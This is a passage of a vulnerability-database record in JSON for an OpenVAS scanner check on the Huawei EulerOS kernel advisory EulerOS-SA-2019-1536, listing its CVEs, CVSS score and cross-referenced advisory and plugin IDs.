{"id": "OPENVAS:1361412562311220191536", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1536)", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "published": "2020-01-23T00:00:00", "modified": "2020-02-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191536", "reporter": "Copyright (C) 2020 Greenbone Networks GmbH", "references": ["https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1536", "2019-1536"], "cvelist": ["CVE-2015-8950", "CVE-2017-17558", "CVE-2018-10940", "CVE-2016-4557", "CVE-2017-14991", "CVE-2016-2847", "CVE-2017-10661", "CVE-2016-9178", "CVE-2018-18021", "CVE-2017-9150", "CVE-2014-4715", "CVE-2016-2550", "CVE-2014-9914", "CVE-2015-0571", "CVE-2014-4611", "CVE-2017-1000370", "CVE-2013-7263", "CVE-2017-1000371", "CVE-2013-7446", "CVE-2014-5471", "CVE-2013-7445", "CVE-2015-8104"], "immutableFields": [], "lastseen": "2020-02-05T16:44:22", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2014-289", "ALAS-2016-669", "ALAS-2016-703", "ALAS-2017-845", "ALAS-2017-914", "ALAS-2018-1100", "ALAS2-2018-1100"]}, {"type": "android", "idList": ["ANDROID:CVE-2013-7446", "ANDROID:CVE-2014-9914"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-05-01", "ANDROID:2016-09-01", "ANDROID:2016-10-01", "ANDROID:2017-02-01", "ANDROID:2017-08-01", "ANDROID:2017-09-01"]}, {"type": "archlinux", "idList": ["ASA-201801-1", "ASA-201801-2", "ASA-201801-3", "ASA-201801-4"]}, {"type": "attackerkb", "idList": ["AKB:AB7462E1-84B6-45B0-8D93-6857FB1CE045"]}, {"type": "avleonov", "idList": ["AVLEONOV:317FBD7DA93C95993A9FFF38FB04A987", "AVLEONOV:A9AB661A53F0E9B8923DE780E6F05F48"]}, {"type": "centos", "idList": ["CESA-2014:0159", "CESA-2014:0285", "CESA-2014:1997", "CESA-2015:0102", "CESA-2015:2552", "CESA-2015:2636", "CESA-2016:2574", "CESA-2018:1062", "CESA-2018:3083", "CESA-2020:1524"]}, {"type": "cisa", "idList": ["CISA:C541BA16D95B14C2CBD295BC9DE8EA16"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:0C99BDFDCDE2F48CF8EC42CB26558A0B", "CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "CFOUNDRY:1E92DA1FCC786D8CF92EF17F4A659881", "CFOUNDRY:539F990C3DAAC021E491E8629DA539FE", "CFOUNDRY:8CFC2758BB5A33EFE62E28CBCF6F0C0C", "CFOUNDRY:DAEEFC1E9FDBBF02A1D3ACCD6434010C", "CFOUNDRY:E36E8558D6E84664F9D34B4A9E5179AC", "CFOUNDRY:EA45FD03FD447E186F125FC46918DCD9"]}, {"type": "cloudlinux", "idList": ["CLSA-2022:1650576075"]}, {"type": "cve", "idList": ["CVE-2013-6405", "CVE-2013-7263", "CVE-2013-7445", "CVE-2013-7446", "CVE-2014-4611", "CVE-2014-4715", "CVE-2014-5471", "CVE-2014-9914", "CVE-2015-0571", "CVE-2015-8104", "CVE-2015-8950", "CVE-2016-2250", "CVE-2016-2550", "CVE-2016-2847", "CVE-2016-4557", "CVE-2016-9178", "CVE-2016-9644", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2017-10661", "CVE-2017-14991", "CVE-2017-17558", "CVE-2017-9150", "CVE-2018-10940", "CVE-2018-16658", "CVE-2018-18021", "CVE-2018-18710"]}, {"type": "debian", "idList": ["DEBIAN:DLA-103-1:4B38C", "DEBIAN:DLA-103-1:72B78", "DEBIAN:DLA-1099-1:57108", "DEBIAN:DLA-1232-1:15F37", "DEBIAN:DLA-1392-1:883BE", "DEBIAN:DLA-1422-1:EBC6F", "DEBIAN:DLA-1422-2:DC70E", "DEBIAN:DLA-1423-1:B239D", "DEBIAN:DLA-360-1:6C323", "DEBIAN:DLA-479-1:373A9", "DEBIAN:DLA-772-1:EB721", "DEBIAN:DSA-2906-1:5B9FC", "DEBIAN:DSA-3414-1:421D5", "DEBIAN:DSA-3426-1:7C23A", "DEBIAN:DSA-3426-1:AC984", "DEBIAN:DSA-3454-1:3BA83", "DEBIAN:DSA-3503-1:23448", "DEBIAN:DSA-3503-1:9DDFA", "DEBIAN:DSA-3981-1:0F636", "DEBIAN:DSA-3981-1:3AC17", "DEBIAN:DSA-4073-1:79398", "DEBIAN:DSA-4082-1:57979", "DEBIAN:DSA-4082-1:58978", "DEBIAN:DSA-4313-1:18892", "DEBIAN:DSA-4313-1:C711E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-7263", "DEBIANCVE:CVE-2013-7445", "DEBIANCVE:CVE-2013-7446", "DEBIANCVE:CVE-2014-4611", "DEBIANCVE:CVE-2014-4715", "DEBIANCVE:CVE-2014-5471", "DEBIANCVE:CVE-2014-9914", "DEBIANCVE:CVE-2015-8104", "DEBIANCVE:CVE-2015-8950", "DEBIANCVE:CVE-2016-2550", "DEBIANCVE:CVE-2016-2847", "DEBIANCVE:CVE-2016-4557", "DEBIANCVE:CVE-2016-9178", "DEBIANCVE:CVE-2016-9644", "DEBIANCVE:CVE-2017-1000370", "DEBIANCVE:CVE-2017-1000371", "DEBIANCVE:CVE-2017-10661", "DEBIANCVE:CVE-2017-14991", "DEBIANCVE:CVE-2017-17558", "DEBIANCVE:CVE-2017-9150", "DEBIANCVE:CVE-2018-10940", "DEBIANCVE:CVE-2018-16658", "DEBIANCVE:CVE-2018-18021", "DEBIANCVE:CVE-2018-18710"]}, {"type": "exploitdb", "idList": ["EDB-ID:40759", "EDB-ID:42274", "EDB-ID:42276", "EDB-ID:43345"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:68588737FAF0ED161AC1D6A540E77231", "EXPLOITPACK:7C30F59E9F9E9C7EFCD4805D95AF6006", "EXPLOITPACK:85787E1ACB0587223CB78E6E35B08397", "EXPLOITPACK:DFB54027B0CAC8B9E041940F5800AB1F"]}, {"type": "f5", "idList": ["F5:K04337834", "F5:K11165942", "F5:K15513", "F5:K15516", "F5:K20022580", "F5:K25423771", "F5:K31026324", "F5:K40523020", "F5:K97457339", "SOL15513", "SOL15516", "SOL15983", "SOL20022580", "SOL31026324"]}, {"type": "fedora", "idList": ["FEDORA:07BC260D55CA", "FEDORA:08D3760E6566", "FEDORA:0A3A560481D7", "FEDORA:0A72361F0A0B", "FEDORA:10F7D6255145", "FEDORA:131186087E1C", "FEDORA:1835E22100", "FEDORA:18E4222173", "FEDORA:1CCC322073", "FEDORA:23B6E225A0", "FEDORA:25BDD6190ECF", "FEDORA:26C5127E25", "FEDORA:2784A21C29", "FEDORA:29049600CFF3", "FEDORA:29FCE65ECD33", "FEDORA:2BA602158D", "FEDORA:2EEE52123F", "FEDORA:2F13360877A3", "FEDORA:3060D60E9A21", "FEDORA:33D8860877E1", "FEDORA:39B5660877A6", "FEDORA:3BDA3607A1A6", "FEDORA:3ED73605E19A", "FEDORA:4359160906D1", "FEDORA:43F19601E6CD", "FEDORA:44065605602A", "FEDORA:4832F6079717", "FEDORA:52C43604E44B", "FEDORA:581F9608B7DF", "FEDORA:5D742610B071", "FEDORA:648496077DD1", "FEDORA:664F260779AC", "FEDORA:6EC6360BEA04", "FEDORA:6F1BC604D0C1", "FEDORA:74245604D4DA", "FEDORA:7640C641CB61", "FEDORA:7734E613B647", "FEDORA:7F8C960BC98D", "FEDORA:84C4E22D8F", "FEDORA:87BD56087904", "FEDORA:89CF6244CB", "FEDORA:8A5146071240", "FEDORA:8E01360DC908", "FEDORA:8F974604E846", "FEDORA:909D360491BF", "FEDORA:9330A21FE6", "FEDORA:A4C8660C350E", "FEDORA:AB52460321C9", "FEDORA:B395E6087A9D", "FEDORA:B54D264CBCAC", "FEDORA:BAFAB6087824", "FEDORA:BD41660BC2B1", "FEDORA:C10006137EFA", "FEDORA:C26F460906BA", "FEDORA:C35B860CD859", "FEDORA:C56CF6087715", "FEDORA:C7C84604E909", "FEDORA:CFDB8604972F", "FEDORA:D15E060F33C2", "FEDORA:D6F86601E6D9", "FEDORA:DF5176048167", "FEDORA:E1D7E6031252", "FEDORA:E2354615BF02", "FEDORA:E328560486E4", "FEDORA:E6F08605DCE7", "FEDORA:E7CE72245B"]}, {"type": "freebsd", "idList": ["2CABFBAB-8BFB-11E5-BD18-002590263BF5"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:814DAD5293CFBE484AFB6C0462210E0D"]}, {"type": "hackerone", "idList": ["H1:17688"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20151124-01-SMARTPHONE", "HUAWEI-SA-20161026-02-SMARTPHONE"]}, {"type": "ibm", "idList": ["0C9BE2F3A245999460BB6BC497E21EC27992E79FB4C1D769E6D1CF729AB33300", "0D95BD029EF7D61B7C200E5DCF5114404F54883607A0E5A132C410EA37160E69", "22DFDD1FF1BBF70D9C813ACA916818103631328A11AEED7718476AD8FD37F722", "2ABC4CD376C07922A3144CF8116D979F4BDDE16EED9AADA11262FBF58C851DBF", "3EB2D1CBDE6F39F65F1D781A1439298F76DA3A8C8C722E723825134FB37DDB9E", "4BB2759DF5CBB6BF54A7D60BF1046942C755D661255DAAC4EF3C0614D1A3AF9A", "6F75059EBDF719D84C8DC0CA4BAADF9428544BDAFCEEAE62F4225A55CA1E8AF0", "A0B51C5217767E75AB974BA93584FB1F969514BA8D7EE9EDD025C20F274C1D2F", "A18DD1594298170A7AF630CBFFA73E78138125D119FBC5D156128BBBD99A03EC", "B7EDA2450D13E204B60C3A3E7379E6FCCD587CB32FEB5041ADDA6CB8E3C44FC3", "CD9B5BF488F3327F1A5D08B8A25E9EF90D7304376F44A16FB3F05E06566E80FF", "F092FBBD34304315E258962CA397F72D24D88CD673A181734FDCE39754098484"]}, {"type": "kaspersky", "idList": ["KLA10744"]}, {"type": "lenovo", "idList": ["LENOVO:PS500321-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2014-0321", "MGASA-2015-0450", "MGASA-2016-0015", "MGASA-2016-0098", "MGASA-2016-0225", "MGASA-2016-0232", "MGASA-2016-0233", "MGASA-2017-0234", "MGASA-2017-0242", "MGASA-2017-0258", "MGASA-2017-0259", "MGASA-2017-0260", "MGASA-2017-0261", "MGASA-2017-0381", "MGASA-2017-0383", "MGASA-2017-0384", "MGASA-2017-0386", "MGASA-2017-0387", "MGASA-2017-0388", "MGASA-2017-0463", "MGASA-2017-0466", "MGASA-2017-0467"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-BPF_PRIV_ESC-"]}, {"type": "nessus", "idList": ["802015.PRM", "AL2_ALAS-2018-1100.NASL", "ALA_ALAS-2013-258.NASL", "ALA_ALAS-2014-289.NASL", "ALA_ALAS-2016-669.NASL", "ALA_ALAS-2016-703.NASL", "ALA_ALAS-2017-845.NASL", "ALA_ALAS-2017-914.NASL", "ALA_ALAS-2018-1100.NASL", "CENTOS_RHSA-2014-0159.NASL", "CENTOS_RHSA-2014-0285.NASL", "CENTOS_RHSA-2014-1997.NASL", "CENTOS_RHSA-2015-0102.NASL", "CENTOS_RHSA-2015-2552.NASL", "CENTOS_RHSA-2015-2636.NASL", "CENTOS_RHSA-2016-2574.NASL", "CENTOS_RHSA-2018-1062.NASL", "CENTOS_RHSA-2018-3083.NASL", "CENTOS_RHSA-2020-1524.NASL", "CITRIX_XENSERVER_CTX202583.NASL", "DEBIAN_DLA-103.NASL", "DEBIAN_DLA-1099.NASL", "DEBIAN_DLA-1232.NASL", "DEBIAN_DLA-1392.NASL", "DEBIAN_DLA-1422.NASL", "DEBIAN_DLA-1423.NASL", "DEBIAN_DLA-360.NASL", "DEBIAN_DLA-479.NASL", "DEBIAN_DLA-772.NASL", "DEBIAN_DSA-2906.NASL", "DEBIAN_DSA-3414.NASL", "DEBIAN_DSA-3426-1.NASL", "DEBIAN_DSA-3454.NASL", "DEBIAN_DSA-3503.NASL", "DEBIAN_DSA-3981.NASL", "DEBIAN_DSA-4073.NASL", "DEBIAN_DSA-4082.NASL", "DEBIAN_DSA-4313.NASL", "EULEROS_SA-2016-1020.NASL", "EULEROS_SA-2017-1245.NASL", "EULEROS_SA-2017-1271.NASL", "EULEROS_SA-2018-1026.NASL", "EULEROS_SA-2018-1031.NASL", "EULEROS_SA-2018-1263.NASL", "EULEROS_SA-2018-1297.NASL", "EULEROS_SA-2018-1373.NASL", "EULEROS_SA-2018-1407.NASL", "EULEROS_SA-2019-1062.NASL", "EULEROS_SA-2019-1156.NASL", "EULEROS_SA-2019-1475.NASL", "EULEROS_SA-2019-1477.NASL", "EULEROS_SA-2019-1481.NASL", "EULEROS_SA-2019-1485.NASL", "EULEROS_SA-2019-1488.NASL", "EULEROS_SA-2019-1492.NASL", "EULEROS_SA-2019-1498.NASL", "EULEROS_SA-2019-1499.NASL", "EULEROS_SA-2019-1501.NASL", "EULEROS_SA-2019-1507.NASL", "EULEROS_SA-2019-1536.NASL", "EULEROS_SA-2019-2353.NASL", "F5_BIGIP_SOL04337834.NASL", "F5_BIGIP_SOL20022580.NASL", "F5_BIGIP_SOL31026324.NASL", "F5_BIGIP_SOL40523020.NASL", "FEDORA_2013-22669.NASL", "FEDORA_2013-22695.NASL", "FEDORA_2013-22818.NASL", "FEDORA_2013-23445.NASL", "FEDORA_2013-23653.NASL", "FEDORA_2014-10312.NASL", "FEDORA_2014-11008.NASL", "FEDORA_2014-7863.NASL", "FEDORA_2014-8171.NASL", "FEDORA_2014-8487.NASL", "FEDORA_2014-9959.NASL", "FEDORA_2015-115C302856.NASL", "FEDORA_2015-394835A3F6.NASL", "FEDORA_2015-668D213DC3.NASL", "FEDORA_2015-C1C2F5E168.NASL", "FEDORA_2015-C59710B05D.NASL", "FEDORA_2015-CD94AD8D7C.NASL", "FEDORA_2015-F150B2A8C8.NASL", "FEDORA_2015-F2C534BC12.NASL", "FEDORA_2016-06F1572324.NASL", "FEDORA_2016-1642A20327.NASL", "FEDORA_2016-746BB5851D.NASL", "FEDORA_2016-84FDC82B74.NASL", "FEDORA_2016-E6CFAFF4B1.NASL", "FEDORA_2016-EF973EFAB7.NASL", "FEDORA_2017-05F10E29F4.NASL", "FEDORA_2017-129969AA8A.NASL", "FEDORA_2017-BA6B6E71F7.NASL", "FEDORA_2017-D3ED702FE4.NASL", "FEDORA_2017-D7BC1B3056.NASL", "FEDORA_2018-94315E9A6B.NASL", "FEDORA_2018-DDBACA855E.NASL", "FEDORA_2018-F392AB8C84.NASL", "FREEBSD_PKG_2CABFBAB8BFB11E5BD18002590263BF5.NASL", "JUNIPER_SPACE_JSA_10826.NASL", "MANDRIVA_MDVSA-2014-001.NASL", "MANDRIVA_MDVSA-2014-201.NASL", "NEWSTART_CGSL_NS-SA-2019-0070_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0074_KERNEL-RT.NASL", "NEWSTART_CGSL_NS-SA-2022-0075_KERNEL.NASL", "NUTANIX_NXSA-AOS-5_11_3.NASL", "NUTANIX_NXSA-AOS-5_16_0_1.NASL", "NUTANIX_NXSA-AOS-5_16_1.NASL", "NUTANIX_NXSA-AOS-5_17.NASL", "OPENSUSE-2014-375.NASL", "OPENSUSE-2014-469.NASL", "OPENSUSE-2014-791.NASL", "OPENSUSE-2014-793.NASL", "OPENSUSE-2015-879.NASL", "OPENSUSE-2015-892.NASL", "OPENSUSE-2015-893.NASL", "OPENSUSE-2016-1015.NASL", "OPENSUSE-2016-1076.NASL", "OPENSUSE-2016-124.NASL", "OPENSUSE-2016-136.NASL", "OPENSUSE-2016-1428.NASL", "OPENSUSE-2016-34.NASL", "OPENSUSE-2016-445.NASL", "OPENSUSE-2016-629.NASL", "OPENSUSE-2016-753.NASL", "OPENSUSE-2016-862.NASL", "OPENSUSE-2017-666.NASL", "OPENSUSE-2018-1016.NASL", "OPENSUSE-2018-1140.NASL", "OPENSUSE-2018-1342.NASL", "OPENSUSE-2018-1427.NASL", "OPENSUSE-2019-769.NASL", "OPENSUSE-2019-893.NASL", "ORACLELINUX_ELSA-2014-0159.NASL", "ORACLELINUX_ELSA-2014-0285-1.NASL", "ORACLELINUX_ELSA-2014-0285.NASL", "ORACLELINUX_ELSA-2014-1997.NASL", "ORACLELINUX_ELSA-2014-3009.NASL", "ORACLELINUX_ELSA-2014-3010.NASL", "ORACLELINUX_ELSA-2014-3011.NASL", "ORACLELINUX_ELSA-2014-3034.NASL", "ORACLELINUX_ELSA-2014-3106.NASL", "ORACLELINUX_ELSA-2014-3107.NASL", "ORACLELINUX_ELSA-2014-3108.NASL", "ORACLELINUX_ELSA-2015-0102.NASL", "ORACLELINUX_ELSA-2015-0290.NASL", "ORACLELINUX_ELSA-2015-1272.NASL", "ORACLELINUX_ELSA-2015-2552.NASL", "ORACLELINUX_ELSA-2015-2636.NASL", "ORACLELINUX_ELSA-2015-3012.NASL", "ORACLELINUX_ELSA-2015-3107.NASL", "ORACLELINUX_ELSA-2016-2574.NASL", "ORACLELINUX_ELSA-2016-3502.NASL", "ORACLELINUX_ELSA-2016-3503.NASL", "ORACLELINUX_ELSA-2016-3596.NASL", "ORACLELINUX_ELSA-2017-3515.NASL", "ORACLELINUX_ELSA-2017-3516.NASL", "ORACLELINUX_ELSA-2017-3533.NASL", "ORACLELINUX_ELSA-2017-3534.NASL", "ORACLELINUX_ELSA-2017-3567.NASL", "ORACLELINUX_ELSA-2017-3635.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3637.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLELINUX_ELSA-2017-3658.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLELINUX_ELSA-2018-1062.NASL", "ORACLELINUX_ELSA-2018-3083.NASL", "ORACLELINUX_ELSA-2018-4071.NASL", "ORACLELINUX_ELSA-2018-4109.NASL", "ORACLELINUX_ELSA-2018-4110.NASL", "ORACLELINUX_ELSA-2018-4227.NASL", "ORACLELINUX_ELSA-2018-4242.NASL", "ORACLELINUX_ELSA-2018-4245.NASL", "ORACLELINUX_ELSA-2018-4250.NASL", "ORACLELINUX_ELSA-2018-4270.NASL", "ORACLELINUX_ELSA-2018-4288.NASL", "ORACLELINUX_ELSA-2018-4300.NASL", "ORACLELINUX_ELSA-2018-4301.NASL", "ORACLELINUX_ELSA-2018-4304.NASL", "ORACLELINUX_ELSA-2019-4316.NASL", "ORACLELINUX_ELSA-2019-4823.NASL", "ORACLELINUX_ELSA-2019-4854.NASL", "ORACLELINUX_ELSA-2019-4855.NASL", "ORACLELINUX_ELSA-2020-1524.NASL", "ORACLELINUX_ELSA-2020-5708.NASL", "ORACLEVM_OVMSA-2015-0040.NASL", "ORACLEVM_OVMSA-2015-0154.NASL", "ORACLEVM_OVMSA-2016-0007.NASL", "ORACLEVM_OVMSA-2016-0037.NASL", "ORACLEVM_OVMSA-2016-0100.NASL", "ORACLEVM_OVMSA-2017-0040.NASL", "ORACLEVM_OVMSA-2017-0041.NASL", "ORACLEVM_OVMSA-2017-0056.NASL", "ORACLEVM_OVMSA-2017-0057.NASL", "ORACLEVM_OVMSA-2017-0106.NASL", "ORACLEVM_OVMSA-2017-0167.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2018-0035.NASL", "ORACLEVM_OVMSA-2018-0284.NASL", "ORACLEVM_OVMSA-2019-0047.NASL", "ORACLEVM_OVMSA-2020-0020.NASL", "REDHAT-RHSA-2014-0159.NASL", "REDHAT-RHSA-2014-0285.NASL", "REDHAT-RHSA-2014-0439.NASL", "REDHAT-RHSA-2014-1318.NASL", "REDHAT-RHSA-2014-1997.NASL", "REDHAT-RHSA-2015-0102.NASL", "REDHAT-RHSA-2015-0695.NASL", "REDHAT-RHSA-2015-0782.NASL", "REDHAT-RHSA-2015-0803.NASL", "REDHAT-RHSA-2015-2552.NASL", "REDHAT-RHSA-2015-2636.NASL", "REDHAT-RHSA-2015-2645.NASL", "REDHAT-RHSA-2016-0004.NASL", "REDHAT-RHSA-2016-0024.NASL", "REDHAT-RHSA-2016-0046.NASL", "REDHAT-RHSA-2016-0103.NASL", "REDHAT-RHSA-2016-2574.NASL", "REDHAT-RHSA-2016-2584.NASL", "REDHAT-RHSA-2017-0217.NASL", "REDHAT-RHSA-2018-0676.NASL", "REDHAT-RHSA-2018-1062.NASL", "REDHAT-RHSA-2018-2948.NASL", "REDHAT-RHSA-2018-3083.NASL", "REDHAT-RHSA-2018-3096.NASL", "REDHAT-RHSA-2018-3656.NASL", "REDHAT-RHSA-2019-1170.NASL", "REDHAT-RHSA-2019-1190.NASL", "REDHAT-RHSA-2019-4057.NASL", "REDHAT-RHSA-2019-4058.NASL", "REDHAT-RHSA-2020-0036.NASL", "REDHAT-RHSA-2020-1524.NASL", "SLACKWARE_SSA_2019-030-01.NASL", "SL_20140211_KERNEL_ON_SL6_X.NASL", "SL_20140312_KERNEL_ON_SL5_X.NASL", "SL_20141216_KERNEL_ON_SL6_X.NASL", "SL_20150128_KERNEL_ON_SL7_X.NASL", "SL_20151208_KERNEL_ON_SL7_X.NASL", "SL_20151215_KERNEL_ON_SL6_X.NASL", "SL_20161103_KERNEL_ON_SL7_X.NASL", "SL_20180410_KERNEL_ON_SL7_X.NASL", "SL_20181030_KERNEL_ON_SL7_X.NASL", "SL_20200422_KERNEL_ON_SL6_X.NASL", "SMB_KB3108638.NASL", "SOLARIS_JUL2016_SRU11_3_8_7_0.NASL", "SUSE_11_KERNEL-140321.NASL", "SUSE_11_KERNEL-140408.NASL", "SUSE_11_KERNEL-140924.NASL", "SUSE_11_KERNEL-141202.NASL", "SUSE_11_KERNEL-141217.NASL", "SUSE_11_KERNEL-150306.NASL", "SUSE_11_KERNEL-BIGSMP-201409-140924.NASL", "SUSE_SU-2014-0772-1.NASL", "SUSE_SU-2014-0773-1.NASL", "SUSE_SU-2014-0832-1.NASL", "SUSE_SU-2015-0481-1.NASL", "SUSE_SU-2015-0652-1.NASL", "SUSE_SU-2015-0812-1.NASL", "SUSE_SU-2015-2108-1.NASL", "SUSE_SU-2015-2194-1.NASL", "SUSE_SU-2015-2306-1.NASL", "SUSE_SU-2015-2324-1.NASL", "SUSE_SU-2015-2326-1.NASL", "SUSE_SU-2015-2328-1.NASL", "SUSE_SU-2015-2338-1.NASL", "SUSE_SU-2015-2339-1.NASL", "SUSE_SU-2016-0585-1.NASL", "SUSE_SU-2016-0658-1.NASL", "SUSE_SU-2016-0785-1.NASL", "SUSE_SU-2016-0911-1.NASL", "SUSE_SU-2016-1203-1.NASL", "SUSE_SU-2016-1672-1.NASL", "SUSE_SU-2016-1690-1.NASL", "SUSE_SU-2016-1696-1.NASL", "SUSE_SU-2016-1995-1.NASL", "SUSE_SU-2016-2001-1.NASL", "SUSE_SU-2016-2002-1.NASL", "SUSE_SU-2016-2005-1.NASL", "SUSE_SU-2016-2006-1.NASL", "SUSE_SU-2016-2010-1.NASL", "SUSE_SU-2016-2014-1.NASL", "SUSE_SU-2016-2074-1.NASL", "SUSE_SU-2017-1853-1.NASL", "SUSE_SU-2017-2525-1.NASL", "SUSE_SU-2017-2908-1.NASL", "SUSE_SU-2017-2920-1.NASL", "SUSE_SU-2017-3265-1.NASL", "SUSE_SU-2017-3287-1.NASL", "SUSE_SU-2017-3289-1.NASL", "SUSE_SU-2017-3293-1.NASL", "SUSE_SU-2017-3299-1.NASL", "SUSE_SU-2017-3301-1.NASL", "SUSE_SU-2017-3302-1.NASL", "SUSE_SU-2017-3303-1.NASL", "SUSE_SU-2017-3304-1.NASL", "SUSE_SU-2017-3305-1.NASL", "SUSE_SU-2017-3308-1.NASL", "SUSE_SU-2017-3309-1.NASL", "SUSE_SU-2017-3312-1.NASL", "SUSE_SU-2017-3313-1.NASL", "SUSE_SU-2017-3316-1.NASL", "SUSE_SU-2017-3318-1.NASL", "SUSE_SU-2017-3320-1.NASL", "SUSE_SU-2017-3321-1.NASL", "SUSE_SU-2017-3322-1.NASL", "SUSE_SU-2017-3323-1.NASL", "SUSE_SU-2017-3332-1.NASL", "SUSE_SU-2017-3336-1.NASL", "SUSE_SU-2017-3337-1.NASL", "SUSE_SU-2017-3340-1.NASL", "SUSE_SU-2018-0011-1.NASL", "SUSE_SU-2018-0031-1.NASL", "SUSE_SU-2018-0040-1.NASL", "SUSE_SU-2018-0115-1.NASL", "SUSE_SU-2018-2858-1.NASL", "SUSE_SU-2018-2879-1.NASL", "SUSE_SU-2018-2907-1.NASL", "SUSE_SU-2018-2908-1.NASL", "SUSE_SU-2018-2980-1.NASL", "SUSE_SU-2018-3083-1.NASL", "SUSE_SU-2018-3084-1.NASL", "SUSE_SU-2018-3689-1.NASL", "SUSE_SU-2018-3746-1.NASL", "SUSE_SU-2018-3934-1.NASL", "SUSE_SU-2018-4069-1.NASL", "SUSE_SU-2019-0095-1.NASL", "SUSE_SU-2019-0224-1.NASL", "SUSE_SU-2019-0439-1.NASL", "SUSE_SU-2019-1289-1.NASL", "SUSE_SU-2019-13937-1.NASL", "UBUNTU_USN-2107-1.NASL", "UBUNTU_USN-2108-1.NASL", "UBUNTU_USN-2109-1.NASL", "UBUNTU_USN-2113-1.NASL", "UBUNTU_USN-2117-1.NASL", "UBUNTU_USN-2135-1.NASL", "UBUNTU_USN-2136-1.NASL", "UBUNTU_USN-2138-1.NASL", "UBUNTU_USN-2287-1.NASL", "UBUNTU_USN-2288-1.NASL", "UBUNTU_USN-2289-1.NASL", "UBUNTU_USN-2290-1.NASL", "UBUNTU_USN-2354-1.NASL", "UBUNTU_USN-2355-1.NASL", "UBUNTU_USN-2356-1.NASL", "UBUNTU_USN-2358-1.NASL", "UBUNTU_USN-2359-1.NASL", "UBUNTU_USN-2840-1.NASL", "UBUNTU_USN-2841-1.NASL", "UBUNTU_USN-2841-2.NASL", "UBUNTU_USN-2842-1.NASL", "UBUNTU_USN-2842-2.NASL", "UBUNTU_USN-2843-1.NASL", "UBUNTU_USN-2843-2.NASL", "UBUNTU_USN-2844-1.NASL", "UBUNTU_USN-2886-1.NASL", "UBUNTU_USN-2887-1.NASL", "UBUNTU_USN-2887-2.NASL", "UBUNTU_USN-2888-1.NASL", "UBUNTU_USN-2889-1.NASL", "UBUNTU_USN-2889-2.NASL", "UBUNTU_USN-2890-1.NASL", "UBUNTU_USN-2890-2.NASL", "UBUNTU_USN-2890-3.NASL", "UBUNTU_USN-2946-1.NASL", "UBUNTU_USN-2946-2.NASL", "UBUNTU_USN-2947-1.NASL", "UBUNTU_USN-2947-2.NASL", "UBUNTU_USN-2947-3.NASL", "UBUNTU_USN-2948-1.NASL", "UBUNTU_USN-2948-2.NASL", "UBUNTU_USN-2949-1.NASL", "UBUNTU_USN-2965-1.NASL", "UBUNTU_USN-2965-2.NASL", "UBUNTU_USN-2965-3.NASL", "UBUNTU_USN-2965-4.NASL", "UBUNTU_USN-2967-1.NASL", "UBUNTU_USN-3161-3.NASL", "UBUNTU_USN-3324-1.NASL", "UBUNTU_USN-3325-1.NASL", "UBUNTU_USN-3345-1.NASL", "UBUNTU_USN-3359-1.NASL", "UBUNTU_USN-3361-1.NASL", "UBUNTU_USN-3364-1.NASL", "UBUNTU_USN-3364-2.NASL", "UBUNTU_USN-3364-3.NASL", "UBUNTU_USN-3422-1.NASL", "UBUNTU_USN-3469-1.NASL", "UBUNTU_USN-3469-2.NASL", "UBUNTU_USN-3470-1.NASL", "UBUNTU_USN-3619-1.NASL", "UBUNTU_USN-3619-2.NASL", "UBUNTU_USN-3676-1.NASL", "UBUNTU_USN-3676-2.NASL", "UBUNTU_USN-3695-1.NASL", "UBUNTU_USN-3695-2.NASL", "UBUNTU_USN-3718-1.NASL", "UBUNTU_USN-3718-2.NASL", "UBUNTU_USN-3754-1.NASL", "UBUNTU_USN-3821-1.NASL", "UBUNTU_USN-3821-2.NASL", "UBUNTU_USN-3931-1.NASL", "UBUNTU_USN-3931-2.NASL", "VIRTUALBOX_5_0_10.NASL", "VIRTUOZZO_VZA-2017-076.NASL", "VIRTUOZZO_VZA-2020-037.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105465", "OPENVAS:1361412562310105517", "OPENVAS:1361412562310105528", "OPENVAS:1361412562310106510", "OPENVAS:1361412562310120008", "OPENVAS:1361412562310120659", "OPENVAS:1361412562310120692", "OPENVAS:1361412562310122797", "OPENVAS:1361412562310122801", "OPENVAS:1361412562310122806", "OPENVAS:1361412562310122821", "OPENVAS:1361412562310122822", "OPENVAS:1361412562310123194", "OPENVAS:1361412562310123211", "OPENVAS:1361412562310123212", "OPENVAS:1361412562310123213", "OPENVAS:1361412562310123219", "OPENVAS:1361412562310123448", "OPENVAS:1361412562310123451", "OPENVAS:1361412562310123463", "OPENVAS:1361412562310123464", "OPENVAS:1361412562310123466", "OPENVAS:1361412562310123469", "OPENVAS:1361412562310131137", "OPENVAS:1361412562310131174", "OPENVAS:1361412562310131256", "OPENVAS:1361412562310702906", "OPENVAS:1361412562310703414", "OPENVAS:1361412562310703426", "OPENVAS:1361412562310703454", "OPENVAS:1361412562310703503", "OPENVAS:1361412562310703981", "OPENVAS:1361412562310704073", "OPENVAS:1361412562310704082", "OPENVAS:1361412562310704313", "OPENVAS:1361412562310806718", "OPENVAS:1361412562310807454", "OPENVAS:1361412562310807494", 